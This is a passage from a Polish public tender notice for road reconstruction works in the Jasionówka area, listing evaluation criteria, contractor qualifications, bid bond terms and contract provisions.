zaoferować jeden z w/w okresów gwarancji. Podanie innego okresu gwarancji spowoduje przyjęcie przez zamawiającego najbliższego z w/w okresów z zaokrągleniem w dół. Podanie przez Wykonawcę krótszego niż 36 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego wymaganego okresu gwarancji (36 miesięcy). Podanie przez Wykonawcę dłuższego okresu niż 84 m-ce skutkować będzie przyjęciem przez Zamawiającego maksymalnego okresu gwarancji. Okres rękojmi zgodnie z obowiązującymi przepisami – art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/><br/> 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:<br/><br/>W = C + G <br/><br/>gdzie: <br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/><br/> 3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po przecinku (jeśli to konieczne).<br/> 4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> 5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/> 6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa z rozbudową drogi gminnej Nr 103423B od granicy gminy (Romejki)- Kamionka - Słomianka - do drogi wojewódzkiej Nr 671) w km 0+000 – 3+744,4. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:<br/>1) cena ofertowa - 60%<br/>2) okres gwarancji – 40%<br/>	gdzie 1% = 1 pkt<br/><br/>Ad 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>	<br/>Ad 2) ocena ofert w kryterium „okres gwarancji” (G) nastąpi wg następującego sposobu:<br/> do 60 m-cy – 0 pkt, za kolejne miesiące gwarancji powyżej 60-ciu (maksymalnie do 84) – punkty przyznane będą proporcjonalnie do liczby tych miesięcy (maksymalnie 40 pkt), wg wzoru:<br/> G = (Go - 60) ÷ 0,6 pkt<br/> gdzie:<br/> G – liczba punktów w kryterium okres gwarancji<br/> Go – okres gwarancji zawarty w ofercie<br/> np. gwarancja od 36 do 60 m-cy = 0 pkt<br/> 66 m-cy: (66-60) ÷ 0,6 pkt = 10 pkt<br/> 72 m-ce: (72-60) ÷ 0,6 pkt= 20 pkt,<br/> 78 m-cy: (78-60) ÷ 0,6 pkt = 30 pkt<br/> 84 m-ce: (84-60) ÷ 0,6 pkt = 40 pkt.<br/> <br/>	Przy czym minimalny okres gwarancji wynosi 36 m-cy, maksymalny 84 m-ce. Wykonawca powinien zaoferować jeden z w/w okresów gwarancji. Podanie innego okresu gwarancji spowoduje przyjęcie przez zamawiającego najbliższego z w/w okresów z zaokrągleniem w dół. Podanie przez Wykonawcę krótszego niż 36 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego wymaganego okresu gwarancji (36 miesięcy). Podanie przez Wykonawcę dłuższego okresu niż 84 m-ce skutkować będzie przyjęciem przez Zamawiającego maksymalnego okresu gwarancji. Okres rękojmi zgodnie z obowiązującymi przepisami – art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/><br/> 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:<br/><br/>W = C + G <br/><br/>gdzie: <br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/><br/> 3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po przecinku (jeśli to konieczne).<br/> 4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> 5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/> 6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi wewnętrznej ul. Knyszyńska, usytuowanej na działce nr geod. 682/6 w Jasionówce </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:<br/>1) cena ofertowa - 60%<br/>2) okres gwarancji – 40%<br/>	gdzie 1% = 1 pkt<br/><br/>Ad 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>	<br/>Ad 2) ocena ofert w kryterium „okres gwarancji” (G) nastąpi wg następującego sposobu:<br/> do 60 m-cy – 0 pkt, za kolejne miesiące gwarancji powyżej 60-ciu (maksymalnie do 84) – punkty przyznane będą proporcjonalnie do liczby tych miesięcy (maksymalnie 40 pkt), wg wzoru:<br/> G = (Go - 60) ÷ 0,6 pkt<br/> gdzie:<br/> G – liczba punktów w kryterium okres gwarancji<br/> Go – okres gwarancji zawarty w ofercie<br/> np. gwarancja od 36 do 60 m-cy = 0 pkt<br/> 66 m-cy: (66-60) ÷ 0,6 pkt = 10 pkt<br/> 72 m-ce: (72-60) ÷ 0,6 pkt= 20 pkt,<br/> 78 m-cy: (78-60) ÷ 0,6 pkt = 30 pkt<br/> 84 m-ce: (84-60) ÷ 0,6 pkt = 40 pkt.<br/> <br/>	Przy czym minimalny okres gwarancji wynosi 36 m-cy, maksymalny 84 m-ce. Wykonawca powinien zaoferować jeden z w/w okresów gwarancji. Podanie innego okresu gwarancji spowoduje przyjęcie przez zamawiającego najbliższego z w/w okresów z zaokrągleniem w dół. Podanie przez Wykonawcę krótszego niż 36 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego wymaganego okresu gwarancji (36 miesięcy). Podanie przez Wykonawcę dłuższego okresu niż 84 m-ce skutkować będzie przyjęciem przez Zamawiającego maksymalnego okresu gwarancji. Okres rękojmi zgodnie z obowiązującymi przepisami – art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/><br/> 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:<br/><br/>W = C + G <br/><br/>gdzie: <br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/><br/> 3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po przecinku (jeśli to konieczne).<br/> 4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> 5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/> 6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym – zamawiający wymaga, aby wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania (w szczególności CEIDG lub KRS)<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – nie dotyczy;<br/> 3) sytuacji ekonomicznej lub finansowej- nie dotyczy<br/> 4) zdolności technicznej lub zawodowej:<br/> a) doświadczenie zawodowe: Zamawiający wymaga aby wykonawca wykazał iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, <br/> Część 1-4 - wykonał co najmniej 1 robotę budowlaną polegającą na przebudowie lub budowie dróg o nawierzchni bitumicznej na odcinku co najmniej 1 km;<br/> Część 5 - wykonał co najmniej 1 robotę budowlaną polegającą na przebudowie, budowie lub wymianie nawierzchni z kostki brukowej o powierzchni co najmniej 500 m2;<br/> b) kadra techniczna: Zamawiający wymaga aby Wykonawca wykazał, że będzie dysponował następującymi osobami, które skieruje do realizacji zamówienia posiadającymi odpowiednie uprawnienia lub równoważne tj.:<br/> - kierownika robót branży drogowej – co najmniej jedna osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności j.w., które zostały wydane na podstawie obowiązujących przepisów, c.d rozdz. XVI SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">zgodnie z rozdz.XVII SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym – zamawiający wymaga, aby wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania (w szczególności CEIDG lub KRS)<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – nie dotyczy;<br/> 3) sytuacji ekonomicznej lub finansowej- nie dotyczy<br/> 4) zdolności technicznej lub zawodowej:<br/> a) doświadczenie zawodowe: Zamawiający wymaga aby wykonawca wykazał iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, <br/> Część 1-4 - wykonał co najmniej 1 robotę budowlaną polegającą na przebudowie lub budowie dróg o nawierzchni bitumicznej na odcinku co najmniej 1 km;<br/> Część 5 - wykonał co najmniej 1 robotę budowlaną polegającą na przebudowie, budowie lub wymianie nawierzchni z kostki brukowej o powierzchni co najmniej 500 m2;<br/> b) kadra techniczna: Zamawiający wymaga aby Wykonawca wykazał, że będzie dysponował następującymi osobami, które skieruje do realizacji zamówienia posiadającymi odpowiednie uprawnienia lub równoważne tj.:<br/> - kierownika robót branży drogowej – co najmniej jedna osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności j.w., które zostały wydane na podstawie obowiązujących przepisów,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający żąda złożenia wraz z ofertą dokumentów potwierdzających, że użyte materiały spełniają wymogi niniejszej SWZ wraz z załącznikami w formie kopii certyfikatu, homologacji poświadczonej przez wykonawcę lub równoważnych dokumentów jednoznacznie potwierdzających spełnianie w/w wymogów oraz oświadczenia, że roboty budowlane zostaną wykonane zgodnie z wymogami SWZ i załączonej dokumentacji.<br/>2. Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie nie krótszym niż 5 dni.<br/>3. Przepisu ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>5. W zakresie nieuregulowanym w SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415) oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> zgodnie z rozdz. XVIII SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> zgodnie z rozdz. XX <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 8. Zamawiający wymaga wniesienia wadium:<br/> 1) Zamawiający określa kwotę wadium w wysokości:<br/> Część 1- 4 – 10000,00 zł <br/> Część 5- 2000,00 zł <br/> 2) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 P.z.p.<br/> 3) Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/> a) pieniądzu;<br/> b) gwarancjach bankowych;<br/> c) gwarancjach ubezpieczeniowych;<br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/> 4) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 08 8076 0001 0000 1339 2000 0010 <br/> 5) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 lit. b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/> 6) Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/> a) upływu terminu związania ofertą;<br/> b) zawarcia umowy w sprawie zamówienia publicznego;<br/> c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/> 7) Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/> a) który wycofał ofertę przed upływem terminu składania ofert;<br/> b) którego oferta została odrzucona;<br/> c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/> d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/> 8) Złożenie wniosku o zwrot wadium, o którym mowa w pkt 7, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX P.zp<br/> 9) Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę<br/> 10) Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <br/> 11) Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/> a) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/> b) wykonawca, którego oferta została wybrana:<br/> - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/> - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/> c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 14. Składanie ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/> 1) Wykonawcy mogą wspólnie ubiegać się o zamówienie publiczne. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (pełnomocnictwo należy dołączyć do oferty).<br/> 2) Dokument pełnomocnictwa określający jego zakres powinien być przedłożony w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza i podpisany przez mocodawcę (osobę fizyczną lub osoby reprezentujące osobę prawną).<br/> 3) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych – pełnomocnikiem.<br/> 4) Wypełniając formularz ofertowy oraz inne dokumenty powołujące się na „Wykonawcę” w miejscu „nazwa i adres Wykonawcy” należy wpisać dane dotyczące Wykonawców wspólnie ubiegających się o zamówienie.<br/> 5) Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Odbiory częściowe dokonywane będą po zgłoszeniu przez Wykonawcę/Wykonawców wszystkich części zamówienia wykonania łącznie minimum 20% i 50% wartości robót, nie później jednak niż wg stanu robót na koniec października 2022 r. (do 20% wynagrodzenia) i czerwca 2023 r. (do 30% wynagrodzenia). Odbiór końcowy – wypłacona zostanie pozostała część wynagrodzenia (nie więcej jednak niż 50 %).<br/>14. Odbiory częściowe przeprowadzane będą w terminie do 7 dni po zakończeniu okresu, o którym mowa w ust. 13.<br/>15. Warunkiem zapłaty przez Zamawiającego drugiej i następnych części należnego wynagrodzenia za odebrane roboty budowlane jest przedstawienie dowodów zapłaty wymagalnego wynagrodzenia podwykonawcom i dalszym podwykonawcom, biorącym udział w realizacji odebranych robót budowlanych.<br/>16. W przypadku nieprzedstawienia przez Wykonawcę wszystkich dowodów zapłaty, o których mowa w ust. 15, wstrzymuje się wypłatę należnego wynagrodzenia za odebrane roboty budowlane - w części równej sumie kwot wynikających z nieprzedstawionych dowodów zapłaty. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności, pod rygorem nieważności, formy pisemnego aneksu podpisanego przez każdą ze stron i będą dopuszczalne jedynie w granicach unormowanych art. 455 ustawy P.z.p. <br/>2. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy jeżeli wystąpiły następujące 